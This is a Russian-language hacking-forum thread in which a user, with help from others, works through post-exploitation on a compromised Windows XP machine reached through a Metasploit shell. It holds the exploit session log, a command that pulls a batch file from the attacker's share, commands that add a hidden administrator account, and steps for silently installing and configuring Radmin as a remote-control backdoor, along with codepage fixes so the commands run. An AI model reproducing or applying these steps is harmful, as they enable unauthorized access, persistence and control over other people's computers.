Форум АНТИЧАТ - кодировка шела metasploit

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - кодировка шела metasploit (https://forum.antichat.xyz/showthread.php?t=93600)

кодировка шела metasploit

[*] Started bind handler[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 3 - lang:Russian[*] Selected Target: Windows XP SP3 Russian (NX)[*] Triggering the vulnerability...[*] Command shell session 8 opened (10.1.0.91:35136 -> 10.1.0.38:4444)

Microsoft Windows XP [‚¥àá¨ï 5.1.2600]
(‘) Š®à¯®à æ¨ï Œ ©ªà®á®äâ, 1985-2001.

C:\WINDOWS\system32>

>> copy \\10.1.0.91\1\1.bat c:\

copy \\10.1.0.91\1\1.bat c:\
¥ ©¤¥ á¥â¥¢®© ¯ãâì.
__________________________________________________ _________________________
chcp1251 не работает

в общем как с этим боротсья подскажите плиз
изза этого я думаю, не создается учетка в группе Администраторы, иочнее учетка создается но не присоедитняется к группе

еще если кто может то подскажите как на удаленной машине скачивать файлы по сети(фтп просьба не предлагать) меня интересует синтаксис copy и xcopy

еще интересно как подключить сетевой диск на удаленной машине чтобы я копировал как с локального диска
вроде пока вопросов больше нет

если кто подскажет буду крайне благодарен, любой информации, а пока пойду гуглить

пс. находил все необходимые команды, но они потерялись, помню что они короткие (не более 10 символов на расшаривание диска с) причем оно реально работало, или подскажите как и где посмотреть логи MSF 3.2 запущенном на ubuntu.

Код:

C:\Users\Администратор>xcopy /?

Копирование файлов и структур каталогов.



Примечание: XCOPY считается устаревшей командой, вместо нее

            рекомендуется использовать ROBOCOPY.



XCOPY источник [результат] [/A | /M] [/D[:дата]] [/P] [/S [/E]] [/V] [/W]

                           [/C] [/I] [/Q] [/F] [/L] [/G] [/H] [/R] [/T] [/U]

                           [/K] [/N] [/O] [/X] [/Y] [/-Y] [/Z] [/B]

                           [/EXCLUDE:файл1[+файл2][+файл3]...]



  источник    Копируемые файлы.

  результат   Местоположение и/или имена новых файлов.

  /A          Копирование только файлов с установленным архивным атрибутом.

              Сам атрибут при этом не изменяется.

  /M          Копирование только файлов с установленным архивным атрибутом.

              После копирования атрибут снимается.

  /D:дата     Копирование файлов, измененных не ранее указанной даты.

              Если дата не указана, заменяются только конечные файлы,

              более старые, чем исходные.

  /EXCLUDE:файл1[+файл2][+файл3]...

              Список файлов, содержащих строки. Каждая текстовая строка должна

              располагаться в отдельной строке файла. Когда любая из строк

              совпадает с любой частью абсолютного пути к копируемому файлу,

              такой файл исключается из операции копирования. К примеру,

              указав строку \obj\ или .obj можно исключить все файлы из

              папки obj или все файлы с расширением obj соответственно.

  /P          Вывод запросов перед созданием каждого нового файла.

  /S          Копирование каталогов с подкаталогами (кроме пустых).

  /E          Копирование каталогов с подкаталогами (в том числе пустых).

              Эквивалентен сочетанию ключей /S /E. Совместим с ключом /T.

  /V          Сравнение конечных файлов с исходными.

  /W          Вывод запроса на нажатие клавиши перед копированием.

  /C          Продолжение копирования, независимо от наличия ошибок.

  /I          Если результат не существует, а копируется несколько файлов,

              считается, что указано имя каталога.

  /Q          Запрет вывода имен копируемых файлов.

  /F          Вывод полных имен исходных и конечных файлов.

  /L          Вывод имен копируемых файлов.

  /G          Копирование зашифрованных файлов в каталог результата, не

              поддерживающий шифрование.

  /H          Копирование скрытых и системных файлов (среди прочих).

  /R          Разрешение замены файлов, предназначенных только для чтения.

  /T          Создание структуры каталогов (кроме пустых каталогов) без

              копирования файлов. Если требуется создать пустые каталоги

              и подкаталоги, используйте сочетание ключей /T /E.

  /U          Копирование только файлов, уже имеющихся в конечном каталоге.

  /K          Копирование атрибута "Только чтение" (обычно он сбрасывается).

  /N          Использование коротких имен при копировании.

  /O          Копирование сведений о владельце и данных ACL.

  /X          Копирование параметров аудита файлов (требует /O).

  /Y          Подавление запроса подтверждения на перезапись существующего

              конечного файла.

  /-Y         Обязательный запрос подтверждения на перезапись существующего

              конечного файла.

  /Z          Копирование сетевых файлов с возобновлением.

  /B          Копирование самой символической ссылки вместо копирования

              целевого объекта этой ссылки



Ключ /Y можно установить через переменную среды COPYCMD.

Ключ /-Y командной строки переопределяет такую установку.

А ты у верен, что у жертвы стоит CP1251?
Попробуй запустить без параметров chcp

Сетевой диск монтируется коммандой subst

Код:

C:\Users\Администратор>subst /?

Сопоставление имени диска указанному пути.



SUBST [диск1: [диск2:]путь]

SUBST диск1: /D



  диск1:         Виртуальный диск, который сопоставляется указанному пути.

  [диск:]путь    Физические диск и путь,

                 которым сопоставляется виртуальный диск.

  /D             Удаление ранее созданного виртуального диска.



Введите SUBST без параметров для вывода текущего списка виртуальных дисков.

Цитата:

Сообщение от -=lebed=-

Код:

Попробуй запустить без параметров chcp





сетевой диск подключил, вопрос снят

.

что именно запустить и как
я юзаю
./msfweb
opera--http://127.0.0.1:55555/
___________________________________________--
вот что попробовал сделать[*] Command shell session 10 opened (10.1.0.91:56278 -> 10.1.0.38:4444)

Microsoft Windows XP [‚¥àá¨ï 5.1.2600]
(‘) Š®à¯®à æ¨ï Œ ©ªà®á®äâ, 1985-2001.

C:\WINDOWS\system32>

>> chcp

chcp
’¥ªãé ï ª®¤®¢ ï áâà ¨æ : 866

чте сделать дальше??
попробовал запустить батник с содержанием
net user adm 1234 /add
net localgroup Администраторы adm /add

и получил
>> 1.bat

1.bat

C:\>net user adm 1234 /add
Š®¬ ¤ ¢ë¯®«¥ ãá¯¥è®.

C:\>net localgroup Ð�Ð´Ð¼Ð¸Ð½Ð¸Ñ�Ñ‚Ñ?Ð°Ñ‚Ð¾Ñ?Ñ‹ adm /add
‘¨áâ¥¬ ï ®è¨¡ª 1376.

“ª § ï «®ª «ì ï £àã¯¯ ¥ áãé¥áâ¢ã¥â.
___________
запустил тотже батник на локальном компе и посмотрел что он мне ответит, ответ получил тот о котором и подозревал- "указанная локальная группа не существует "

ввел net localgroup Администраторы adm /add в цмд и получил ответ "Команда успешно выполнена"
вопрос о кодировке остается открытым

Цитата:

Сообщение от diakon2

Текущая кодовая страница 866 (Dos), выполни в шеле
chcp 1251

P.S. Декодировал штирлицом кракозябры получилось:
dos->iso Win -> DOS (2064)

Цитата:

Сообщение от -=lebed=-

запустил в шеле (мсф консоле)
>> chcp 1251

chcp 1251
’¥ªãé ï ª®¤®¢ ï áâà ¨æ : 1251

C:\>

>> 1.bat

1.bat

C:\>net user adm 1234 /add
Š®¬ ¤ ¢ë¯®«¥ ãá¯¥è®.

C:\>net localgroup ÐÐ´Ð¼Ð¸Ð½Ð¸ÑÑ‚Ñ€Ð°Ñ‚Ð¾Ñ€Ñ‹ adm /add
‘¨áâ¥¬ ï ®è¨¡ª 1376.

“ª § ï «®ª «ì ï £àã¯¯ ¥ áãé¥áâ¢ã¥â.

в общем все завелось)) надо было немного голову включить))
шаг1
в щеле chcp 1251
в gedit сохранил батник с кодировкой windows-1251
ответ в щеле пришол кривой но команда отработала успешно))

Цитата:

Сообщение от diakon2

запустил в шеле (мсф консоле)
>> chcp 1251

chcp 1251
’¥ªãé ï ª®¤®¢ ï áâà ¨æ : 1251

C:\>

>> 1.bat

1.bat

C:\>net user adm 1234 /add
Š®¬ ¤ ¢ë¯®«¥ ãá¯¥è®.

C:\>net localgroup Ð�Ð´Ð¼Ð¸Ð½Ð¸Ñ�Ñ‚Ñ?Ð°Ñ‚Ð¾Ñ?Ñ‹ adm /add
‘¨áâ¥¬ ï ®è¨¡ª 1376.

“ª § ï «®ª «ì ï £àã¯¯ ¥ áãé¥áâ¢ã¥â.

Теперь показывает WIN->DOS (3)
Где-то идёт перекодирование...

Первая комманда выполнена успешно.
Вторая комманда: Указанная локальная группа не существует.

ок тогда как сделать так чтобы я видел русские буквы ??
какая у меня кодировка в ubuntu 8.04 hardy ?
и я так понял надо в шеле выставить туже

и еще такой вопрос о радмине2.2
в шеле
1 скопировал в систем32 raddrv.dll и r_server.exe
2 r_server /install /port:4899 /pass:1234567890 /save
3 r_server /start

но чото както не рабоатет
запускаю радмин под вайном(на вайн не грешу ибо на тачки куда ставился радмин локально конектится нормально xD)
вот как бы я не игрался с /port радмин как висел на 4899 так и висит, в тасклист только после каждой операции с рсервером появляется новый процесс но нмап все равно говорит о открытом 4899 порте

где накосорезил ??
ах да забыл сказать что когда пытаюсь подключиться к серверу то пишет чтото про фильтрацию, но когда пытаюсь подключиться на другой порт то тупо"нельзя подключиться"

такую ситуацию я наблюдал когда пытался подключиться к машине с ненастроеным радмином(например сборка zver), то есть он какбы установлен и даже запущен но пока я его ручкеами не настрою( через его же графическую оболочку конфига) он работать отказывался и выдавал ту же самую ошибку

пс: на радмине не настаиваю но нужна прога для удаленного управления и чтобы устанавливалась с команднйо строки

это последний вопрос в данной теме

Цитата:

Сетевой диск монтируется коммандой subst

net use

в общем проблема было в том что на компах почемуто не работала настройка радмина из командной строки((
проблема решилась таким образом

на локальном компе
r_server.exe /setup
вбил ручками порт и пароль
ребут
экспортирвал ветку реестра в которой лежали все настройки радмина
удалил эту ветку
r_server.exe /stop
убил процес r_server.exe
удалил радмина со всеми осчтавшимися потрохами
ребут
скопировал радмина заново в папку систем32
скопировал туда рег фаил
запустил рег фаил
РЕБУТНУЛ КОМПЬЮТЕР
после ребута в реестре появилась ветка со всеми настройками радмина
подключился радминеом)))

был счастлив

всем спс кто пмомг
тему можно закрывать xD